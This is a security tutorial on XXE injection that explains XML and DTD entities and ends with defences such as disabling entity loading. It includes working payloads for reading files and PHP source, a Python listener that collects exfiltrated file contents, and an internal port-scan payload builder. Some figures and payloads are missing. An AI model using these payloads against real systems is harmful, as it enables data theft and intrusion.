Understanding XXE Vulnerability: Exploiting XML External Entity Injection



XXE Vulnerability

XXE stands for XML External Entity injection.

An XXE vulnerability typically arises where an application accepts uploaded or submitted XML and parses it without filtering. The parser can then be made to load malicious external files and code, which can lead to arbitrary file reads, command execution, internal network port scanning, attacks on internal websites, and denial-of-service (DoS) attacks. Understanding XXE requires a basic grasp of how XML documents are structured.

XML is a structured markup language for annotating electronic documents. It can tag data and define data types, and it lets users define their own markup languages. An XML document consists of an XML declaration, an optional DTD (document type definition), and the document elements.


Introduction and Purpose of XML

XML is designed to transport and store data. XML documents form a tree structure starting from the “root” and then expanding to “branches and leaves.”

XML allows authors to define their own tags and document structures.

Building Blocks of XML Documents

All XML documents (and HTML documents) are made up of the following simple building blocks:

  • Elements
  • Attributes
  • Entities
  • PCDATA
  • CDATA

Below is a brief description of each building block.

1. Element

Elements are the primary building blocks of XML and HTML documents. Elements can contain text, other elements, or be empty. Example:

    <body>body text in between</body>
    <message>some message in between</message>

Examples of empty HTML elements are “hr”, “br”, and “img”.

2. Attribute

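Attributes provide additional information about elements. They are written as name="value" pairs inside the opening tag, such as the src attribute of an HTML img element.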
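As a minimal sketch, Python's standard xml.etree.ElementTree module can show how a parser exposes elements and attributes. The sample document, its element names, and the id attribute are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample: a root element with one attribute, a child holding
# text, and an empty child element.
DOC = '<note id="501"><to>George</to><hr/></note>'

root = ET.fromstring(DOC)

element_name = root.tag             # name of the root element
attributes = root.attrib            # attributes as a dict of name -> value
child_text = root.find("to").text   # text content of the <to> element
empty_text = root.find("hr").text   # an empty element has no text (None)

print(element_name, attributes, child_text, empty_text)
```

The element name, its attributes, and its content are kept separate by the parser, which is why attribute values must be quoted to be unambiguous.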

3. Entity

Entities are variables that define reusable text. An entity reference, written &name;, is replaced by the entity's value when the document is parsed; for example, &lt; stands for the < character.

4. PCDATA

PCDATA stands for Parsed Character Data. It is text that the parser will parse, checking it for entities and markup.

5. CDATA

CDATA stands for Character Data. CDATA is text that will not be parsed by the parser.
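The difference between parsed and unparsed text can be seen in a short sketch using Python's standard xml.etree.ElementTree module. The element names parsed and literal are hypothetical.

```python
import xml.etree.ElementTree as ET

DOC = (
    "<root>"
    # PCDATA: entity references are expanded by the parser.
    "<parsed>1 &lt; 2 &amp; 3</parsed>"
    # CDATA section: the content is passed through untouched.
    "<literal><![CDATA[1 &lt; 2 <b>not a tag</b>]]></literal>"
    "</root>"
)

root = ET.fromstring(DOC)
parsed_text = root.find("parsed").text
literal_text = root.find("literal").text

print(parsed_text)   # entity references replaced by the characters they name
print(literal_text)  # markup and entity references kept as plain text
```

Inside the CDATA section neither the entity reference nor the apparent b tag is interpreted, so the literal element ends up with no child elements.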

XML Syntax Rules

  • All XML elements must have a closing tag
  • XML tags are case sensitive
  • XML elements must be properly nested
  • XML attribute values must be quoted
  • Special characters such as < and & must be written as entity references (&lt; and &amp;)
  • In XML, whitespace is preserved
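These rules can be checked mechanically. The sketch below feeds a few hand-written samples to Python's standard xml.etree.ElementTree parser and records which ones are accepted; the helper name is_well_formed and the sample strings are illustrative only.

```python
import xml.etree.ElementTree as ET


def is_well_formed(text: str) -> bool:
    """Return True if the parser accepts the text as well-formed XML."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


SAMPLES = {
    "closed and nested": "<a><b>ok</b></a>",
    "missing closing tag": "<a><b>ok</a>",
    "case mismatch": "<Note>text</note>",
    "improper nesting": "<a><b></a></b>",
    "unquoted attribute": "<a id=1></a>",
    "bare ampersand": "<a>fish & chips</a>",
    "escaped ampersand": "<a>fish &amp; chips</a>",
}

results = {label: is_well_formed(xml) for label, xml in SAMPLES.items()}
for label, ok in results.items():
    print(f"{label}: {'accepted' if ok else 'rejected'}")

# Whitespace inside an element is kept exactly as written.
spaced = ET.fromstring("<a>  two  spaces  </a>").text
```

Only the first and last samples are accepted; every other sample breaks one of the rules listed above.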

Function Introduction

Introduction of file_get_contents function

The file_get_contents() function reads the entire file into a string.

Introduction of php://input

php://input is a read-only stream that allows access to the raw data from the request.

Combined as file_get_contents("php://input"), it reads the raw data submitted via POST.

Introduction of simplexml_load_string function

The simplexml_load_string() function in PHP converts a well-formed XML string into a SimpleXMLElement object.

Functions for Echoing Parsed XML

In PHP, print_r() or echo can be used to output the parsed content.

Code with XXE Vulnerability

PoC URIs for Testing in PHP

file:///path/file.txt

http://url/file.ext

php://filter/read=convert.base64-encode/resource=conf.php

DTD (Document Type Definition)

A DTD (Document Type Definition) defines the legal building blocks of an XML document.

DTD can be declared inside the XML document or referenced externally.

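1. Internal declaration, using the form <!DOCTYPE root-element [element-declarations]>. Complete example:

    <?xml version="1.0"?>
    <!DOCTYPE note [
      <!ELEMENT note (to,from,heading,body)>
      <!ELEMENT to      (#PCDATA)>
      <!ELEMENT from    (#PCDATA)>
      <!ELEMENT heading (#PCDATA)>
      <!ELEMENT body    (#PCDATA)>
    ]>
    <note>
      <to>George</to>
      <from>John</from>
      <heading>Reminder</heading>
      <body>Don't forget the meeting!</body>
    </note>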

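2. External declaration (referencing an external DTD), using the form <!DOCTYPE root-element SYSTEM "filename">. Complete example:

    <?xml version="1.0"?>
    <!DOCTYPE note SYSTEM "note.dtd">
    <note>
      <to>George</to>
      <from>John</from>
      <heading>Reminder</heading>
      <body>Don't forget the meeting!</body>
    </note>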

And the content of note.dtd is:

    <!ELEMENT note (to,from,heading,body)>
    <!ELEMENT to (#PCDATA)>
    <!ELEMENT from (#PCDATA)>
    <!ELEMENT heading (#PCDATA)>
    <!ELEMENT body (#PCDATA)>
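A parser can report whether a document carries its DTD internally or points to an external one. The sketch below uses the StartDoctypeDeclHandler callback of Python's standard expat binding; the helper name describe_doctype is hypothetical, and the sample documents are shortened versions of the note example.

```python
from xml.parsers import expat


def describe_doctype(xml_text: str):
    """Return (root name, system id, has internal subset), or None without a DOCTYPE."""
    seen = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        seen.append((name, system_id, bool(has_internal_subset)))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)  # True marks this as the final chunk
    return seen[0] if seen else None


INTERNAL = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from)>
  <!ELEMENT to   (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
]>
<note><to>George</to><from>John</from></note>"""

EXTERNAL = """<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note><to>George</to><from>John</from></note>"""

internal_info = describe_doctype(INTERNAL)
external_info = describe_doctype(EXTERNAL)
no_dtd_info = describe_doctype("<note/>")
print(internal_info, external_info, no_dtd_info)
```

In this configuration expat only reports the declaration; it does not fetch note.dtd, so the sketch runs without that file being present.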

DTD Entities

DTD entities are variables used to define shortcuts for referencing plain text or special characters, which can be declared internally or referenced externally.

Entities are divided into general entities and parameter entities.

1. A general entity is declared as <!ENTITY entityName "entity content"> and referenced as:

&entityName;

2. A parameter entity can only be used inside a DTD. It is declared as <!ENTITY % entityName "entity content"> and referenced as:

%entityName;
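The two axes (general versus parameter, internal versus external) can be made concrete by asking a parser to list the declarations it sees. This is a sketch using the EntityDeclHandler callback of Python's standard expat binding; the entity names greeting, shared, and remote are invented, and the URL is the placeholder from the PoC list.

```python
from xml.parsers import expat


def list_entities(xml_text: str):
    """Return (name, kind, origin) for each entity declared in the DTD."""
    found = []
    parser = expat.ParserCreate()

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        kind = "parameter" if is_parameter else "general"
        # External entities carry a system identifier instead of a literal value.
        origin = "external" if system_id is not None else "internal"
        found.append((name, kind, origin))

    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_text, True)
    return found


DOC = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY greeting "hello">
  <!ENTITY % shared "INCLUDE">
  <!ENTITY remote SYSTEM "http://url/file.ext">
]>
<root>&greeting;</root>"""

entities = list_entities(DOC)
for entry in entities:
    print(entry)
```

The remote entity is only declared here, never referenced, so nothing is fetched while the declarations are listed.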

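1. Internal entity declaration, using the form <!ENTITY entityName "entity value">, for example <!ENTITY eviltest "eviltest">. Complete example:

    <?xml version="1.0"?>
    <!DOCTYPE test [
      <!ENTITY writer "Bill Gates">
      <!ENTITY copyright "Copyright W3School.com.cn">
    ]>
    <test>&writer;&copyright;</test>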

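2. External entity declaration, using the form <!ENTITY entityName SYSTEM "URI">. Complete example:

    <?xml version="1.0"?>
    <!DOCTYPE test [
      <!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
      <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
    ]>
    <test>&writer;&copyright;</test>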
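How a parser treats the two kinds of declaration depends on the library. As one data point, the sketch below runs both through Python's standard xml.etree.ElementTree, which expands internal entities but refuses to resolve external ones. The helper name expand is hypothetical, and other parsers (including the PHP functions discussed earlier) may behave differently.

```python
import xml.etree.ElementTree as ET

INTERNAL = """<?xml version="1.0"?>
<!DOCTYPE test [
  <!ENTITY copyright "Copyright W3School.com.cn">
]>
<test>&copyright;</test>"""

EXTERNAL = """<?xml version="1.0"?>
<!DOCTYPE test [
  <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
]>
<test>&copyright;</test>"""


def expand(xml_text: str) -> str:
    """Return the root element's text, or a note if the parser refuses the input."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError as exc:
        return f"refused: {exc}"


internal_result = expand(INTERNAL)
external_result = expand(EXTERNAL)
print(internal_result)
print(external_result)
```

No network request is made for the external case: ElementTree raises a ParseError as soon as it meets the reference.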

Supported Protocols

The protocols that can appear in an external entity URI differ between programs.

[Figure: protocols supported by different programs]

Of these, PHP supports the most protocols, although some of them require specific extensions to be installed.

Exploiting the Vulnerability

Exploitation of Echo-Capable XXE Vulnerability

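The payloads take the following shape, where root is a placeholder element name and the URIs are those from the PoC list above.

Reading Document Files

    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///path/file.txt">]>
    <root>&xxe;</root>

Reading PHP Files

    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=conf.php">]>
    <root>&xxe;</root>

Base64-encoding the file through php://filter lets PHP source be returned as plain text instead of breaking the XML document.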
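To see why an echoed entity leaks file contents, the sketch below reproduces the effect in Python rather than PHP, using the standard xml.sax parser with external general entities explicitly switched on (they are off by default since Python 3.7.1). The temporary file stands in for a sensitive file, and the element name root, the entity name xxe, and the helper names are placeholders.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Accumulate all character data seen in the document."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse the document and return its text content."""
    collector = TextCollector()
    parser = xml.sax.make_parser()
    # This feature decides whether SYSTEM entities are fetched and expanded.
    parser.setFeature(feature_external_ges, resolve_external)
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


# Stand-in for a sensitive file on the server.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("secret-from-disk")
    secret_path = fh.name

payload = (
    '<?xml version="1.0"?>'
    f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{secret_path}">]>'
    "<root>&xxe;</root>"
).encode()

try:
    leaked = parse_text(payload, resolve_external=True)    # vulnerable setting
    blocked = parse_text(payload, resolve_external=False)  # safe setting
finally:
    os.unlink(secret_path)

print(repr(leaked), repr(blocked))
```

With resolution enabled the file content becomes part of the document text, so any code that echoes the parsed result hands it to the attacker. With it disabled the reference expands to nothing.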

Principle of Non-Echo XXE Testing

Request XML

 

&e1;

Server DTD

Use gedit to set the contents of test.dtd to the file contents shown in the figure below.

Use Wireshark to Capture HTTP and View Information

XXE Attacks and Their Impact (XML External Entity)

XXE Impact 1: Arbitrary File Reading

This case reads /etc/passwd. Some XML parsing libraries also support directory listing, so an attacker can list directories, read files, and harvest credentials. For example, reading tomcat-users.xml yields the account and password needed to log in to the Tomcat manager and deploy a web shell.

Data can be sent to a remote server.

The content of the remote evil.dtd file is as follows:

After triggering the XXE attack, the server will send the file content to the attacker’s website.
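On the receiving side, the attacker only needs something that records incoming requests. The following is a rough sketch of such a listener in Python, under the assumption that the stolen content arrives base64-encoded in a query parameter named p. That parameter name, the /collect path, and the helper names are hypothetical and not taken from the original evil.dtd.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse


def decode_exfil(request_path: str) -> list:
    """Decode every base64 value of the hypothetical `p` query parameter."""
    params = parse_qs(urlparse(request_path).query)
    decoded = []
    for value in params.get("p", []):
        # An unescaped '+' in a query string is read as a space, so restore it.
        raw = base64.b64decode(value.replace(" ", "+"))
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


class ExfilHandler(BaseHTTPRequestHandler):
    """Print whatever a vulnerable parser sends and answer with an empty 200."""

    def do_GET(self):
        for item in decode_exfil(self.path):
            print("received:", item)
        self.send_response(200)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Run the listener until interrupted (not started automatically here)."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()


# Simulate the path of a request made after the entity has been expanded.
sample_path = "/collect?p=" + base64.b64encode(b"root:x:0:0:root:/root:/bin/bash").decode()
sample_decoded = decode_exfil(sample_path)
print(sample_decoded)
```

Encoding the file before it is placed in the URL matters because raw file contents usually contain newlines and other characters that are not valid in a URL.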

XXE Impact 2: Execute System Commands

This case executes system commands in a PHP environment with the expect extension installed, where the expect:// wrapper runs the command named in the entity URI. Other protocols may also allow command execution.

XXE Impact 3: Internal Network Port Scanning

This case involves probing ports 80 and 81 of 192.168.1.1. The “Connection refused” response indicates that port 81 is closed while port 80 is open.
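The probing logic can be sketched as two small Python helpers: one builds a payload per port, the other interprets the error text echoed back. The element name root, the entity name xxe, and the "likely open" label are assumptions; only the "Connection refused" rule comes from the case described above.

```python
def build_probe(host: str, port: int) -> str:
    """Return an XML payload whose external entity points at host:port."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://{host}:{port}/">]>\n'
        "<root>&xxe;</root>"
    )


def classify(response_text: str) -> str:
    """Guess the port state from the error text echoed by the target."""
    if "Connection refused" in response_text:
        return "closed"
    # Any other outcome (a page, an HTTP error, a parse error) suggests
    # that something answered on the port.
    return "likely open"


probes = {port: build_probe("192.168.1.1", port) for port in (80, 81)}
print(probes[81])
print(classify("failed to open stream: Connection refused"))
print(classify("HTTP request failed! HTTP/1.1 404 Not Found"))
```

Each payload would be submitted to the vulnerable endpoint in turn, and the response text passed to classify.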

XXE Impact 4: Attacking Internal Network Websites

This case involves attacking an internal Struts2 website and executing system commands remotely.

How to Defend Against XXE Attacks

1. Use the Language's Built-in Mechanism to Disable External Entities

PHP:

    libxml_disable_entity_loader(true);

Java:

    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    dbf.setExpandEntityReferences(false);

Python:

    from lxml import etree
    xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))

Note that libxml_disable_entity_loader() is deprecated as of PHP 8.0, which requires libxml 2.9.0 or later, where external entity loading is disabled by default.

2. Filter User-Submitted XML Data

Keywords: <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.
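Rather than matching keywords in the raw text, one way to apply the same idea is to let a parser detect the DOCTYPE and reject the input before it is processed further. The sketch below does this with Python's standard library; the names DoctypeForbidden and parse_untrusted are hypothetical, and the third-party defusedxml package offers a more complete version of this approach.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse XML only if it declares no DTD, and therefore no custom entities."""

    def reject(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject
    checker.Parse(xml_text, True)  # raises DoctypeForbidden or expat.ExpatError
    return ET.fromstring(xml_text)


benign = parse_untrusted("<order><item>book</item></order>")
print(benign.find("item").text)

malicious = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///path/file.txt">]>'
    "<root>&xxe;</root>"
)
try:
    parse_untrusted(malicious)
    rejected = False
except DoctypeForbidden:
    rejected = True
print("rejected:", rejected)
```

The input is parsed twice, which keeps the sketch short at the cost of some extra work. Rejecting every DOCTYPE is stricter than filtering individual keywords, but it avoids false matches on ordinary text that happens to contain words such as SYSTEM.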

